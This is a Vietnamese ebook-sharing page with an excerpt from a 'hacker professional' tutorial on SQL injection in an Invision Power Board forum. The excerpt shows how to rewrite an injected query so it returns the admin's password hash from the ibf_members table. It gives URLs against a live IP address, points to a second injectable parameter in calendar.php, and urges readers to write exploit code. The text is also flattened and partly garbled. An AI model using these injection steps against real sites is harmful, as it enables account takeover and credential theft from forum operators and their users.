Đang chuẩn bị nút TẢI XUỐNG, xin hãy chờ
Tải xuống
Tham khảo tài liệu 'hacker professional ebook part 223', công nghệ thông tin, kỹ thuật lập trình phục vụ nhu cầu học tập, nghiên cứu và làm việc hiệu quả | và tôi sẽ thay thế trường t.title thành m.password Trích SELECT t.tid m.password t.description t.state t.posts t.starter_id t.start_date t.last_poster_id t.last_post t.icon_id t.starter_name t.last_poster_name t.poll_state t.last_vote t.views t.forum_id t.approved t.author_mode t.pinned t.moved_to t.rating t.total_votes f.topic_mm_id f.name as forum_name f.quick_reply f.id as forum_id f.read_perms f.reply_perms f.parent_id f.use_html f.start_perms f.allow_poll f.password f.posts as forum_posts f.topics as forum_topics f.upload_perms f.show_rules f.rules_text f.rules_title c.name as cat_name c.id as cat_id FROM ibf_topics t ibf_forums f ibf_categories c ibf_members m WHERE t.tid 1 vậy bây giờ ta có thể lấy pass admin đựoc rùi và chú ý là phải thay thế cái WHERE t.tid 1 thành WHERE m.id 1 với việc này là ta SELECT theo trường Id trong Table ibf_members . id 1 là số Id của admin vậy link là http 72.36.192.69 phucducc demo ssi ind.0WHERE 20m.id 1 bạn nhìn lên màn hình ở trên cũng ầy sẽ thấy chuỗi pass hiện ra dưới dạng passhash nếu bạn chưa thấy rõ thì chúng ta sẽ cho passhash hiện ra ở phần khác chỉ cần thay đổi giá trị mà bạn muốn hiện ra là được thay đổi các column truy vấn là Ok thoai vì cái WEB này Code nó làm sao ấy nên mình không cho nó hiện ra dễ nhìn hơn được code khác thì dễ hơn Hiiiiiii trungthep VNISS Trích Cái nì dùng cho version mấy vậy lão cái này là DEMO nó áp dụng cho lỗi SQL inject trong Forum nên phiên bản nào không quan trọng chỉ cần sự tư duy tính toán kỹ là có thể viết được Code Exploitx các Bug Sql inject trong Forum các anh em có thể khai nghiên cứu và viết code Exploitx cái Bug này Bug nằm ở file calendar.php trong thư mục Source http 72.36.192.69 phucducc demo s.vent eventid 1 phần Bug http 72.36.192.69 phucducc demo s.eventid 1 Trích mySQL query error SELECT FROM ibf_calendar_events WHERE eventid 1 mySQL error You have an error in your SQL syntax. Check the manual that corresponds to your MySQL server version for the right syntax to use near